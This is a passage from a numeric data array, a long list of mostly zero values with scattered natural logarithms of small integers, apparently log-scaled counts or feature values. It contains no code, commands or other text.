0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.3978952727983707, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0,\n 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 5.723585101952381, 0.0, 0.0, 4.1588830833596715, 0.0, 0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0,\n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.0986122886681098, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.4339872044851467, 0,\n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.302585092994046, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 3.4011973816621555, 0.0, \n 1.0986122886681098, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.9459101490553132, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0, 0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.7612001156935624, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 3.58351893845611, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 3.7369991058576035, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.6094379124341003, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, \n 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 2.5649493574615367, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0,\n 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 2.4849066497880004, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.772588722239781, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.5649493574615367, 0, 0.0, 0.0, 0.0,\n 0.0, 1.3862943611198906, 0.0, 0.6931471805599453, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.6931471805599453, 0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 6.351472826488934, 0.0, 0.0, 0.0, 0.0, 0, 0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 2.550898738446989, 0.0, 0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 1.3862943611198906, 0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.3862943611198906, 0, 0.0,\n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.3862943611198906, 0, 0.0, 0, 0.0,\n 3.295836866004329, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 3.58351893845611, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 1.6094379124341003, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.772588722239781, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 2.302585092994046, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0, 0.0, 2.302585092994046, 0.0, 0.0, 2.8398715690385097, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 2.1972245773362196, 0, 0.0, 0.0, 0.0, 0.0, \n 2.772588722239781, 0, 1.9459101490553132, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 2.550898738446989, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 1.0986122886681098, \n 4.624972813284271, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0,\n 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.3978952727983707, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 2.0794415416798357, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 3.4965075614664802, 0, 0.0, 0.0, 0, 0.0, 0, \n 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0,\n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 1.6094379124341003, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0,\n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 3.178053830347946, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.258096538021482, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 3.178053830347946, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 4.330733340286331, 0.0, 2.1972245773362196, 0.0, 5.030437921392435, 0.0,\n 6.836775589408022, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 2.8398715690385097, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 2.5649493574615367, 3.8918202981106265, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0, 0.0, 0.0, 2.0794415416798357, 2.9444389791664403, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 4.581130849408909, 4.969640753475787, 0.0, 5.723585101952381, \n 1.3862943611198906, 0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0, 0.0, \n 1.0986122886681098, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 2.302585092994046, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.9957322735539913, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 2.550898738446989, 0.0, 0.0, 2.0794415416798357, 0, 